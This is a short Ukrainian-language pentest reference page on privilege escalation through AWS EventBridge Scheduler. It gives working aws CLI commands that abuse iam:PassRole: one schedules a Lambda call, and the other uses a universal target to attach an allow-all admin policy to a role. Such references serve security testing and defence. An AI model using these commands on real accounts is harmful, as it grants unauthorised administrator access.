AWS - EventBridge Scheduler Privesc

Reading time: 3 minutes

EventBridge Scheduler

Детальніше про EventBridge Scheduler у:

AWS - EventBridge Scheduler Enum

iam:PassRole, (scheduler:CreateSchedule | scheduler:UpdateSchedule)

Зловмисник з такими правами зможе create|update scheduler і зловживати правами ролі scheduler, прикріпленої до нього, щоб виконувати будь-які дії

Наприклад, вони можуть налаштувати розклад так, щоб викликати Lambda function, яка є шаблонованою дією:

aws scheduler create-schedule \
--name MyLambdaSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:lambda:<region>:<account-id>:function:<LambdaFunctionName>",
"RoleArn": "arn:aws:iam::<account-id>:role/<RoleName>"
}'

Окрім шаблонних дій сервісу, ви можете використовувати universal targets в EventBridge Scheduler, щоб викликати широкий спектр API-операцій для багатьох сервісів AWS. Universal targets пропонують гнучкість для виклику майже будь-якого API. Один приклад — використання universal targets для додавання "AdminAccessPolicy", використовуючи роль, яка має політику "putRolePolicy":

aws scheduler create-schedule \
--name GrantAdminToTargetRoleSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy",
"RoleArn": "arn:aws:iam::<account-id>:role/RoleWithPutPolicy",
"Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}"
}'

Посилання

• https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html
• https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html